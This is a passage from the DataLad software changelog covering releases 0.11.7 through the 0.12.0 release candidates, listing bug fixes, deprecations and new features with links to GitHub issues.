(`#3959 <https://github.com/datalad/datalad/issues/3959>`__)\n\n- `diff <http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html>`__\n inappropriately reported files as deleted in some cases when ``to``\n was a value other than ``None``.\n (`#3999 <https://github.com/datalad/datalad/issues/3999>`__)\n\n- An assortment of fixes for Windows compatibility.\n (`#3971 <https://github.com/datalad/datalad/issues/3971>`__)\n (`#3974 <https://github.com/datalad/datalad/issues/3974>`__)\n (`#3975 <https://github.com/datalad/datalad/issues/3975>`__)\n (`#3976 <https://github.com/datalad/datalad/issues/3976>`__)\n (`#3979 <https://github.com/datalad/datalad/issues/3979>`__)\n\n- Subdatasets installed from a source given by relative path will now\n have this relative path used as ‘url’ in their .gitmodules record,\n instead of an absolute path generated by Git.\n (`#3538 <https://github.com/datalad/datalad/issues/3538>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n will now correctly interpret ‘~/…’ paths as absolute path\n specifications.\n (`#3958 <https://github.com/datalad/datalad/issues/3958>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n mistakenly reported a directory as a procedure.\n (`#3793 <https://github.com/datalad/datalad/issues/3793>`__)\n\n- The cleanup for batched git-annex processes has been improved.\n (`#3794 <https://github.com/datalad/datalad/issues/3794>`__)\n (`#3851 <https://github.com/datalad/datalad/issues/3851>`__)\n\n- The function for adding a version ID to an AWS S3 URL doesn’t support\n URLs with an “s3://” scheme and raises a ``NotImplementedError``\n exception when it encounters one. The function learned to return a\n URL untouched if an “s3://” URL comes in with a version ID.\n (`#3842 <https://github.com/datalad/datalad/issues/3842>`__)\n\n- A few spots needed to be adjusted for compatibility with git-annex’s\n new ``--sameas``\n `feature <https://git-annex.branchable.com/tips/multiple_remotes_accessing_the_same_data_store/>`__,\n which allows special remotes to share a data store.\n (`#3856 <https://github.com/datalad/datalad/issues/3856>`__)\n\n- The ``swallow_logs`` utility failed to capture some log messages due\n to an incompatibility with Python 3.7.\n (`#3935 <https://github.com/datalad/datalad/issues/3935>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n\n - crashed if ``--inherit`` was passed but the parent dataset did not\n have a remote with a matching name.\n (`#3954 <https://github.com/datalad/datalad/issues/3954>`__)\n - configured the wrong pushurl and annexurl values in some cases.\n (`#3955 <https://github.com/datalad/datalad/issues/3955>`__)\n\nEnhancements and new features since 0.12.0rc6\n---------------------------------------------\n\n- By default, datasets cloned from local source paths will now get a\n configured remote for any recursively discoverable ‘origin’ sibling\n that is also available from a local path in order to maximize\n automatic file availability across local annexes.\n (`#3926 <https://github.com/datalad/datalad/issues/3926>`__)\n\n- The new `result hooks\n mechanism <http://handbook.datalad.org/en/latest/basics/101-145-hooks.html>`__\n allows callers to specify, via local Git configuration values,\n DataLad command calls that will be triggered in response to matching\n result records (i.e., what you see when you call a command with\n ``-f 
json_pp``).\n (`#3903 <https://github.com/datalad/datalad/issues/3903>`__)\n\n- The command interface classes learned to use a new ``_examples_``\n attribute to render documentation examples for both the Python and\n command-line API.\n (`#3821 <https://github.com/datalad/datalad/issues/3821>`__)\n\n- Candidate URLs for cloning a submodule can now be generated based on\n configured templates that have access to various properties of the\n submodule, including its dataset ID.\n (`#3828 <https://github.com/datalad/datalad/issues/3828>`__)\n\n- DataLad’s check that the user’s Git identity is configured has been\n sped up and now considers the appropriate environment variables as\n well. (`#3807 <https://github.com/datalad/datalad/issues/3807>`__)\n\n- The ``tag`` method of ``GitRepo`` can now tag revisions other than\n ``HEAD`` and accepts a list of arbitrary ``git tag`` options.\n (`#3787 <https://github.com/datalad/datalad/issues/3787>`__)\n\n- When ``get`` clones a subdataset and the subdataset’s HEAD differs\n from the commit that is registered in the parent, the active branch\n of the subdataset is moved to the registered commit if the registered\n commit is an ancestor of the subdataset’s HEAD commit. This handling\n has been moved to a more central location within ``GitRepo``, and now\n applies to any ``update_submodule(..., init=True)`` call.\n (`#3831 <https://github.com/datalad/datalad/issues/3831>`__)\n\n- The output of ``datalad -h`` has been reformatted to improve\n readability.\n (`#3862 <https://github.com/datalad/datalad/issues/3862>`__)\n\n- `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n has been sped up.\n (`#3880 <https://github.com/datalad/datalad/issues/3880>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n learned to provide and render more information about discovered\n procedures, including whether the procedure is overridden by another\n procedure with the same base name.\n (`#3960 <https://github.com/datalad/datalad/issues/3960>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n now (`#3817 <https://github.com/datalad/datalad/issues/3817>`__)\n\n - records the active branch in the superdataset when registering a\n new subdataset.\n - calls ``git annex sync`` when saving a dataset on an adjusted\n branch so that the changes are brought into the mainline branch.\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n now aborts when its ``dataset`` argument points to a non-existent\n dataset. 
(`#3940 <https://github.com/datalad/datalad/issues/3940>`__)

- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__
  now

  - reports the dataset ID if the current working directory is
    visiting a dataset.
    (`#3888 <https://github.com/datalad/datalad/issues/3888>`__)
  - outputs entries deterministically.
    (`#3927 <https://github.com/datalad/datalad/issues/3927>`__)

- The ``ConfigManager`` class

  - learned to exclude ``.datalad/config`` as a source of
    configuration values, restricting the sources to standard Git
    configuration files, when called with ``source="local"``.
    (`#3907 <https://github.com/datalad/datalad/issues/3907>`__)
  - accepts a value of “override” for its ``where`` argument to allow
    Python callers to override configuration more conveniently.
    (`#3970 <https://github.com/datalad/datalad/issues/3970>`__)

- Commands now accept a ``dataset`` value of “^.” as shorthand for “the
  dataset to which the current directory belongs”; see the sketch below.
  (`#3242 <https://github.com/datalad/datalad/issues/3242>`__)
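A minimal sketch of the new shorthand (an illustration only; it assumes the
current working directory lies inside a dataset and that the Python API
accepts the same ``dataset`` shorthands as the command line)::

    import datalad.api as dl

    # "^." resolves to the dataset that contains the current working
    # directory, so no dataset path needs to be spelled out.
    dl.save(dataset='^.', message='record changes in the containing dataset')

    # "^" resolves to the topmost superdataset instead.
    dl.status(dataset='^')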
0.12.0rc6 (Oct 19, 2019) – some releases are better than the others
===================================================================

We bet we will fix some bugs and make the world an even better place.

.. _major-refactoring-and-deprecations-5:

Major refactoring and deprecations
----------------------------------

- DataLad no longer supports Python 2. The minimum supported version of
  Python is now 3.5.
  (`#3629 <https://github.com/datalad/datalad/issues/3629>`__)

- Much of the user-focused content at http://docs.datalad.org has been
  removed in favor of more up to date and complete material available
  in the `DataLad Handbook <http://handbook.datalad.org>`__. Going
  forward, the plan is to restrict http://docs.datalad.org to technical
  documentation geared at developers.
  (`#3678 <https://github.com/datalad/datalad/issues/3678>`__)

- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__
  used to allow the caller to specify which dataset(s) to update as a
  ``PATH`` argument or via the ``--dataset`` option; now only the
  latter is supported. Path arguments only serve to restrict which
  subdatasets are updated when operating recursively (see the sketch
  after this list).
  (`#3700 <https://github.com/datalad/datalad/issues/3700>`__)

- Result records from a
  `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__
  call no longer have a “state” key.
  (`#3746 <https://github.com/datalad/datalad/issues/3746>`__)

- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__
  and
  `get <http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html>`__
  no longer support operating on independent hierarchies of datasets.
  (`#3700 <https://github.com/datalad/datalad/issues/3700>`__)
  (`#3746 <https://github.com/datalad/datalad/issues/3746>`__)

- The
  `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__
  update in 0.12.0rc4 for the new path resolution logic broke the
  handling of inputs and outputs for calls from a subdirectory.
  (`#3747 <https://github.com/datalad/datalad/issues/3747>`__)

- The ``is_submodule_modified`` method of ``GitRepo`` as well as two
  helper functions in gitrepo.py, ``kwargs_to_options`` and
  ``split_remote_branch``, were no longer used internally or in any
  known DataLad extensions and have been removed.
  (`#3702 <https://github.com/datalad/datalad/issues/3702>`__)
  (`#3704 <https://github.com/datalad/datalad/issues/3704>`__)

- The ``only_remote`` option of ``GitRepo.is_with_annex`` was not used
  internally or in any known extensions and has been dropped.
  (`#3768 <https://github.com/datalad/datalad/issues/3768>`__)

- The ``get_tags`` method of ``GitRepo`` used to sort tags by committer
  date. It now sorts them by the tagger date for annotated tags and the
  committer date for lightweight tags.
  (`#3715 <https://github.com/datalad/datalad/issues/3715>`__)

- The ``rev_resolve_path`` helper has replaced ``resolve_path``.
  (`#3797 <https://github.com/datalad/datalad/issues/3797>`__)
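A minimal sketch of the adjusted ``update`` semantics (an illustration only;
it assumes the Python API mirrors the command-line ``dataset``, ``path``, and
``recursive`` parameters, and the paths shown are hypothetical)::

    import datalad.api as dl

    # The dataset to operate on is always given via `dataset` ...
    dl.update(dataset='/tmp/myds', recursive=True)

    # ... while path arguments merely restrict which subdatasets are
    # touched during a recursive update.
    dl.update(dataset='/tmp/myds', path=['code/subds-a'], recursive=True)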
.. _fixes-21:

Fixes
-----

- Correctly handle relative paths in
  `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__.
  (`#3799 <https://github.com/datalad/datalad/issues/3799>`__)
  (`#3102 <https://github.com/datalad/datalad/issues/3102>`__)

- Do not erroneously discover a directory as a procedure.
  (`#3793 <https://github.com/datalad/datalad/issues/3793>`__)

- Correctly extract version from manpage to trigger use of manpages for
  ``--help``.
  (`#3798 <https://github.com/datalad/datalad/issues/3798>`__)

- The ``cfg_yoda`` procedure saved all modifications in the repository
  rather than saving only the files it modified.
  (`#3680 <https://github.com/datalad/datalad/issues/3680>`__)

- Some spots in the documentation that were supposed to appear as two
  hyphens were incorrectly rendered as en-dashes in the HTML output.
  (`#3692 <https://github.com/datalad/datalad/issues/3692>`__)

- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,
  `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__,
  and
  `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__
  treated paths as relative to the dataset even when the string form
  was given, violating the new path handling rules.
  (`#3749 <https://github.com/datalad/datalad/issues/3749>`__)
  (`#3777 <https://github.com/datalad/datalad/issues/3777>`__)
  (`#3780 <https://github.com/datalad/datalad/issues/3780>`__)

- Providing the “^” shortcut to ``--dataset`` didn’t work properly when
  called from a subdirectory of a subdataset.
  (`#3772 <https://github.com/datalad/datalad/issues/3772>`__)

- We failed to propagate some errors from git-annex when working with
  its JSON output.
  (`#3751 <https://github.com/datalad/datalad/issues/3751>`__)

- With the Python API, callers are allowed to pass a string or list of
  strings as the ``cfg_proc`` argument to
  `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,
  but the string form was mishandled.
  (`#3761 <https://github.com/datalad/datalad/issues/3761>`__)

- Incorrect command quoting for SSH calls on Windows rendered basic
  SSH-related functionality (e.g.,
  `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__)
  unusable.
  (`#3688 <https://github.com/datalad/datalad/issues/3688>`__)

- Annex JSON result handling assumed platform-specific paths on Windows
  instead of the POSIX-style paths used across all platforms.
  (`#3719 <https://github.com/datalad/datalad/issues/3719>`__)

- ``path_is_under()`` was incapable of comparing Windows paths with
  different drive letters.
  (`#3728 <https://github.com/datalad/datalad/issues/3728>`__)

.. _enhancements-and-new-features-20:

Enhancements and new features
-----------------------------

- Provide a collection of “public” ``call_git*`` helpers within GitRepo
  and replace use of “private” and less specific
  ``_git_custom_command`` calls.
  (`#3791 <https://github.com/datalad/datalad/issues/3791>`__)

- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__
  gained a ``--report-filetype`` option.
Setting it to “raw” can give a\n performance boost for the price of no longer distinguishing symlinks\n that point to annexed content from other symlinks.\n (`#3701 <https://github.com/datalad/datalad/issues/3701>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n disables file type reporting by\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n to improve performance.\n (`#3712 <https://github.com/datalad/datalad/issues/3712>`__)\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n (`#3743 <https://github.com/datalad/datalad/issues/3743>`__)\n\n - now extends its result records with a ``contains`` field that\n lists which ``contains`` arguments matched a given subdataset.\n - yields an ‘impossible’ result record when a ``contains`` argument\n wasn’t matched to any of the reported subdatasets.\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__\n now shows more readable output when cloning fails.\n (`#3775 <https://github.com/datalad/datalad/issues/3775>`__)\n\n- ``SSHConnection`` now displays a more informative error message when\n it cannot start the ``ControlMaster`` process.\n (`#3776 <https://github.com/datalad/datalad/issues/3776>`__)\n\n- If the new configuration option ``datalad.log.result-level`` is set\n to a single level, all result records will be logged at that level.\n If you’ve been bothered by DataLad’s double reporting of failures,\n consider setting this to “debug”.\n (`#3754 <https://github.com/datalad/datalad/issues/3754>`__)\n\n- Configuration values from ``datalad -c OPTION=VALUE ...`` are now\n validated to provide better errors.\n (`#3695 <https://github.com/datalad/datalad/issues/3695>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n learned how to handle history with merges. As was already the case\n when cherry picking non-run commits, re-creating merges may results\n in conflicts, and ``rerun`` does not yet provide an interface to let\n the user handle these.\n (`#2754 <https://github.com/datalad/datalad/issues/2754>`__)\n\n- The ``fsck`` method of ``AnnexRepo`` has been enhanced to expose more\n features of the underlying ``git fsck`` command.\n (`#3693 <https://github.com/datalad/datalad/issues/3693>`__)\n\n- ``GitRepo`` now has a ``for_each_ref_`` method that wraps\n ``git for-each-ref``, which is used in various spots that used to\n rely on GitPython functionality.\n (`#3705 <https://github.com/datalad/datalad/issues/3705>`__)\n\n- Do not pretend to be able to work in optimized (``python -O``) mode,\n crash early with an informative message.\n (`#3803 <https://github.com/datalad/datalad/issues/3803>`__)\n\n0.12.0rc5 (September 04, 2019) – .\n==================================\n\nVarious fixes and enhancements that bring the 0.12.0 release closer.\n\n.. _major-refactoring-and-deprecations-6:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The two modules below have a new home. 
The old locations still exist\n as compatibility shims and will be removed in a future release.\n\n - ``datalad.distribution.subdatasets`` has been moved to\n ``datalad.local.subdatasets``\n (`#3429 <https://github.com/datalad/datalad/issues/3429>`__)\n - ``datalad.interface.run`` has been moved to\n ``datalad.core.local.run``\n (`#3444 <https://github.com/datalad/datalad/issues/3444>`__)\n\n- The ``lock`` method of ``AnnexRepo`` and the ``options`` parameter of\n ``AnnexRepo.unlock`` were unused internally and have been removed.\n (`#3459 <https://github.com/datalad/datalad/issues/3459>`__)\n\n- The ``get_submodules`` method of ``GitRepo`` has been rewritten\n without GitPython. When the new ``compat`` flag is true (the current\n default), the method returns a value that is compatible with the old\n return value. This backwards-compatible return value and the\n ``compat`` flag will be removed in a future release.\n (`#3508 <https://github.com/datalad/datalad/issues/3508>`__)\n\n- The logic for resolving relative paths given to a command has changed\n (`#3435 <https://github.com/datalad/datalad/issues/3435>`__). The new\n rule is that relative paths are taken as relative to the dataset only\n if a dataset *instance* is passed by the caller. In all other\n scenarios they’re considered relative to the current directory.\n\n The main user-visible difference from the command line is that using\n the ``--dataset`` argument does *not* result in relative paths being\n taken as relative to the specified dataset. (The undocumented\n distinction between “rel/path” and “./rel/path” no longer exists.)\n\n All commands under ``datalad.core`` and ``datalad.local``, as well as\n ``unlock`` and ``addurls``, follow the new logic. The goal is for all\n commands to eventually do so.\n\n.. _fixes-22:\n\nFixes\n-----\n\n- The function for loading JSON streams wasn’t clever enough to handle\n content that included a Unicode line separator like U2028.\n (`#3524 <https://github.com/datalad/datalad/issues/3524>`__)\n\n- When\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n was called without an explicit target (i.e., a directory or no paths\n at all), the call failed if any of the files did not have content\n present. 
(`#3459 <https://github.com/datalad/datalad/issues/3459>`__)\n\n- ``AnnexRepo.get_content_info`` failed in the rare case of a key\n without size information.\n (`#3534 <https://github.com/datalad/datalad/issues/3534>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n ignored ``--on-failure`` in its underlying call to\n `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__.\n (`#3470 <https://github.com/datalad/datalad/issues/3470>`__)\n\n- Calling\n `remove <http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html>`__\n with a subdirectory displayed spurious warnings about the\n subdirectory files not existing.\n (`#3586 <https://github.com/datalad/datalad/issues/3586>`__)\n\n- Our processing of ``git-annex --json`` output mishandled info\n messages from special remotes.\n (`#3546 <https://github.com/datalad/datalad/issues/3546>`__)\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n\n - didn’t bypass the “existing subdataset” check when called with\n ``--force`` as of 0.12.0rc3\n (`#3552 <https://github.com/datalad/datalad/issues/3552>`__)\n - failed to register the up-to-date revision of a subdataset when\n ``--cfg-proc`` was used with ``--dataset``\n (`#3591 <https://github.com/datalad/datalad/issues/3591>`__)\n\n- The base downloader had some error handling that wasn’t compatible\n with Python 3.\n (`#3622 <https://github.com/datalad/datalad/issues/3622>`__)\n\n- Fixed a number of Unicode py2-compatibility issues.\n (`#3602 <https://github.com/datalad/datalad/issues/3602>`__)\n\n- ``AnnexRepo.get_content_annexinfo`` did not properly chunk file\n arguments to avoid exceeding the command-line character limit.\n (`#3587 <https://github.com/datalad/datalad/issues/3587>`__)\n\n.. _enhancements-and-new-features-21:\n\nEnhancements and new features\n-----------------------------\n\n- New command ``create-sibling-gitlab`` provides an interface for\n creating a publication target on a GitLab instance.\n (`#3447 <https://github.com/datalad/datalad/issues/3447>`__)\n\n- `subdatasets <http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html>`__\n (`#3429 <https://github.com/datalad/datalad/issues/3429>`__)\n\n - now supports path-constrained queries in the same manner as\n commands like ``save`` and ``status``\n - gained a ``--contains=PATH`` option that can be used to restrict\n the output to datasets that include a specific path.\n - now narrows the listed subdatasets to those underneath the current\n directory when called with no arguments\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n learned to accept a plain ``--annex`` (no value) as shorthand for\n ``--annex basic``.\n (`#3534 <https://github.com/datalad/datalad/issues/3534>`__)\n\n- The ``.dirty`` property of ``GitRepo`` and ``AnnexRepo`` has been\n sped up. 
(`#3460 <https://github.com/datalad/datalad/issues/3460>`__)\n\n- The ``get_content_info`` method of ``GitRepo``, used by ``status``\n and commands that depend on ``status``, now restricts its git calls\n to a subset of files, if possible, for a performance gain in\n repositories with many files.\n (`#3508 <https://github.com/datalad/datalad/issues/3508>`__)\n\n- Extensions that do not provide a command, such as those that provide\n only metadata extractors, are now supported.\n (`#3531 <https://github.com/datalad/datalad/issues/3531>`__)\n\n- When calling git-annex with ``--json``, we log standard error at the\n debug level rather than the warning level if a non-zero exit is\n expected behavior.\n (`#3518 <https://github.com/datalad/datalad/issues/3518>`__)\n\n- `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__\n no longer refuses to create a new dataset in the odd scenario of an\n empty .git/ directory upstairs.\n (`#3475 <https://github.com/datalad/datalad/issues/3475>`__)\n\n- As of v2.22.0 Git treats a sub-repository on an unborn branch as a\n repository rather than as a directory. Our documentation and tests\n have been updated appropriately.\n (`#3476 <https://github.com/datalad/datalad/issues/3476>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n learned to accept a ``--cfg-proc`` value and pass it to its\n ``create`` calls.\n (`#3562 <https://github.com/datalad/datalad/issues/3562>`__)\n\n0.12.0rc4 (May 15, 2019) – the revolution is over\n=================================================\n\nWith the replacement of the ``save`` command implementation with\n``rev-save`` the revolution effort is now over, and the set of key\ncommands for local dataset operations (``create``, ``run``, ``save``,\n``status``, ``diff``) is now complete. This new core API is available\nfrom ``datalad.core.local`` (and also via ``datalad.api``, as any other\ncommand).\n\n.. _major-refactoring-and-deprecations-7:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The ``add`` command is now deprecated. It will be removed in a future\n release.\n\n.. _fixes-23:\n\nFixes\n-----\n\n- Remove hard-coded dependencies on POSIX path conventions in SSH\n support code\n (`#3400 <https://github.com/datalad/datalad/issues/3400>`__)\n\n- Emit an ``add`` result when adding a new subdataset during\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n (`#3398 <https://github.com/datalad/datalad/issues/3398>`__)\n\n- SSH file transfer now actually opens a shared connection, if none\n exists yet\n (`#3403 <https://github.com/datalad/datalad/issues/3403>`__)\n\n.. _enhancements-and-new-features-22:\n\nEnhancements and new features\n-----------------------------\n\n- ``SSHConnection`` now offers methods for file upload and download\n (``get()``, ``put()``. The previous ``copy()`` method only supported\n upload and was discontinued\n (`#3401 <https://github.com/datalad/datalad/issues/3401>`__)\n\n0.12.0rc3 (May 07, 2019) – the revolution continues\n===================================================\n\nContinues API consolidation and replaces the ``create`` and ``diff``\ncommand with more performant implementations.\n\n.. 
_major-refactoring-and-deprecations-8:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- The previous ``diff`` command has been replaced by the diff variant\n from the\n `datalad-revolution <http://github.com/datalad/datalad-revolution>`__\n extension.\n (`#3366 <https://github.com/datalad/datalad/issues/3366>`__)\n\n- ``rev-create`` has been renamed to ``create``, and the previous\n ``create`` has been removed.\n (`#3383 <https://github.com/datalad/datalad/issues/3383>`__)\n\n- The procedure ``setup_yoda_dataset`` has been renamed to ``cfg_yoda``\n (`#3353 <https://github.com/datalad/datalad/issues/3353>`__).\n\n- The ``--nosave`` of ``addurls`` now affects only added content, not\n newly created subdatasets\n (`#3259 <https://github.com/datalad/datalad/issues/3259>`__).\n\n- ``Dataset.get_subdatasets`` (deprecated since v0.9.0) has been\n removed. (`#3336 <https://github.com/datalad/datalad/issues/3336>`__)\n\n- The ``.is_dirty`` method of ``GitRepo`` and ``AnnexRepo`` has been\n replaced by ``.status`` or, for a subset of cases, the ``.dirty``\n property.\n (`#3330 <https://github.com/datalad/datalad/issues/3330>`__)\n\n- ``AnnexRepo.get_status`` has been replaced by ``AnnexRepo.status``.\n (`#3330 <https://github.com/datalad/datalad/issues/3330>`__)\n\n.. _fixes-24:\n\nFixes\n-----\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n\n - reported on directories that contained only ignored files\n (`#3238 <https://github.com/datalad/datalad/issues/3238>`__)\n - gave a confusing failure when called from a subdataset with an\n explicitly specified dataset argument and “.” as a path\n (`#3325 <https://github.com/datalad/datalad/issues/3325>`__)\n - misleadingly claimed that the locally present content size was\n zero when ``--annex basic`` was specified\n (`#3378 <https://github.com/datalad/datalad/issues/3378>`__)\n\n- An informative error wasn’t given when a download provider was\n invalid. (`#3258 <https://github.com/datalad/datalad/issues/3258>`__)\n\n- Calling ``rev-save PATH`` saved unspecified untracked subdatasets.\n (`#3288 <https://github.com/datalad/datalad/issues/3288>`__)\n\n- The available choices for command-line options that take values are\n now displayed more consistently in the help output.\n (`#3326 <https://github.com/datalad/datalad/issues/3326>`__)\n\n- The new pathlib-based code had various encoding issues on Python 2.\n (`#3332 <https://github.com/datalad/datalad/issues/3332>`__)\n\n.. 
_enhancements-and-new-features-23:\n\nEnhancements and new features\n-----------------------------\n\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n now includes information about the Python version.\n (`#3255 <https://github.com/datalad/datalad/issues/3255>`__)\n\n- When operating in an annex repository, checking whether git-annex is\n available is now delayed until a call to git-annex is actually\n needed, allowing systems without git-annex to operate on annex\n repositories in a restricted fashion.\n (`#3274 <https://github.com/datalad/datalad/issues/3274>`__)\n\n- The ``load_stream`` on helper now supports auto-detection of\n compressed files.\n (`#3289 <https://github.com/datalad/datalad/issues/3289>`__)\n\n- ``create`` (formerly ``rev-create``)\n\n - learned to be speedier by passing a path to ``status``\n (`#3294 <https://github.com/datalad/datalad/issues/3294>`__)\n - gained a ``--cfg-proc`` (or ``-c``) convenience option for running\n configuration procedures (or more accurately any procedure that\n begins with “cfg\\_”) in the newly created dataset\n (`#3353 <https://github.com/datalad/datalad/issues/3353>`__)\n\n- ``AnnexRepo.set_metadata`` now returns a list while\n ``AnnexRepo.set_metadata_`` returns a generator, a behavior which is\n consistent with the ``add`` and ``add_`` method pair.\n (`#3298 <https://github.com/datalad/datalad/issues/3298>`__)\n\n- ``AnnexRepo.get_metadata`` now supports batch querying of known annex\n files. Note, however, that callers should carefully validate the\n input paths because the batch call will silently hang if given\n non-annex files.\n (`#3364 <https://github.com/datalad/datalad/issues/3364>`__)\n\n- `status <http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html>`__\n\n - now reports a “bytesize” field for files tracked by Git\n (`#3299 <https://github.com/datalad/datalad/issues/3299>`__)\n - gained a new option ``eval_subdataset_state`` that controls how\n the subdataset state is evaluated. Depending on the information\n you need, you can select a less expensive mode to make ``status``\n faster.\n (`#3324 <https://github.com/datalad/datalad/issues/3324>`__)\n - colors deleted files “red”\n (`#3334 <https://github.com/datalad/datalad/issues/3334>`__)\n\n- Querying repository content is faster due to batching of\n ``git cat-file`` calls.\n (`#3301 <https://github.com/datalad/datalad/issues/3301>`__)\n\n- The dataset ID of a subdataset is now recorded in the superdataset.\n (`#3304 <https://github.com/datalad/datalad/issues/3304>`__)\n\n- ``GitRepo.diffstatus``\n\n - now avoids subdataset recursion when the comparison is not with\n the working tree, which substantially improves performance when\n diffing large dataset hierarchies\n (`#3314 <https://github.com/datalad/datalad/issues/3314>`__)\n - got smarter and faster about labeling a subdataset as “modified”\n (`#3343 <https://github.com/datalad/datalad/issues/3343>`__)\n\n- ``GitRepo.get_content_info`` now supports disabling the file type\n evaluation, which gives a performance boost in cases where this\n information isn’t needed.\n (`#3362 <https://github.com/datalad/datalad/issues/3362>`__)\n\n- The XMP metadata extractor now filters based on file name to improve\n its performance.\n (`#3329 <https://github.com/datalad/datalad/issues/3329>`__)\n\n0.12.0rc2 (Mar 18, 2019) – revolution!\n======================================\n\n.. 
_fixes-25:\n\nFixes\n-----\n\n- ``GitRepo.dirty`` does not report on nested empty directories\n (`#3196 <https://github.com/datalad/datalad/issues/3196>`__).\n\n- ``GitRepo.save()`` reports results on deleted files.\n\n.. _enhancements-and-new-features-24:\n\nEnhancements and new features\n-----------------------------\n\n- Absorb a new set of core commands from the datalad-revolution\n extension:\n\n - ``rev-status``: like ``git status``, but simpler and working with\n dataset hierarchies\n - ``rev-save``: a 2-in-1 replacement for save and add\n - ``rev-create``: a ~30% faster create\n\n- JSON support tools can now read and write compressed files.\n\n0.12.0rc1 (Mar 03, 2019) – to boldly go …\n=========================================\n\n.. _major-refactoring-and-deprecations-9:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Discontinued support for git-annex direct-mode (also no longer\n supported upstream).\n\n.. _enhancements-and-new-features-25:\n\nEnhancements and new features\n-----------------------------\n\n- Dataset and Repo object instances are now hashable, and can be\n created based on pathlib Path object instances\n\n- Imported various additional methods for the Repo classes to query\n information and save changes.\n\n0.11.8 (Oct 11, 2019) – annex-we-are-catching-up\n================================================\n\n.. _fixes-26:\n\nFixes\n-----\n\n- Our internal command runner failed to capture output in some cases.\n (`#3656 <https://github.com/datalad/datalad/issues/3656>`__)\n- Workaround in the tests around python in cPython >= 3.7.5 ‘;’ in the\n filename confusing mimetypes\n (`#3769 <https://github.com/datalad/datalad/issues/3769>`__)\n (`#3770 <https://github.com/datalad/datalad/issues/3770>`__)\n\n.. _enhancements-and-new-features-26:\n\nEnhancements and new features\n-----------------------------\n\n- Prepared for upstream changes in git-annex, including support for the\n latest git-annex\n\n - 7.20190912 auto-upgrades v5 repositories to v7.\n (`#3648 <https://github.com/datalad/datalad/issues/3648>`__)\n (`#3682 <https://github.com/datalad/datalad/issues/3682>`__)\n - 7.20191009 fixed treatment of (larger/smaller)than in\n .gitattributes\n (`#3765 <https://github.com/datalad/datalad/issues/3765>`__)\n\n- The ``cfg_text2git`` procedure, as well the ``--text-no-annex``\n option of\n `create <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html>`__,\n now configure .gitattributes so that empty files are stored in git\n rather than annex.\n (`#3667 <https://github.com/datalad/datalad/issues/3667>`__)\n\n0.11.7 (Sep 06, 2019) – python2-we-still-love-you-but-…\n=======================================================\n\nPrimarily bugfixes with some optimizations and refactorings.\n\n.. 
_fixes-27:\n\nFixes\n-----\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n\n - now provides better handling when the URL file isn’t in the\n expected format.\n (`#3579 <https://github.com/datalad/datalad/issues/3579>`__)\n - always considered a relative file for the URL file argument as\n relative to the current working directory, which goes against the\n convention used by other commands of taking relative paths as\n relative to the dataset argument.\n (`#3582 <https://github.com/datalad/datalad/issues/3582>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n\n - hard coded “python” when formatting the command for non-executable\n procedures ending with “.py”. ``sys.executable`` is now used.\n (`#3624 <https://github.com/datalad/datalad/issues/3624>`__)\n - failed if arguments needed more complicated quoting than simply\n surrounding the value with double quotes. This has been resolved\n for systems that support ``shlex.quote``, but note that on Windows\n values are left unquoted.\n (`#3626 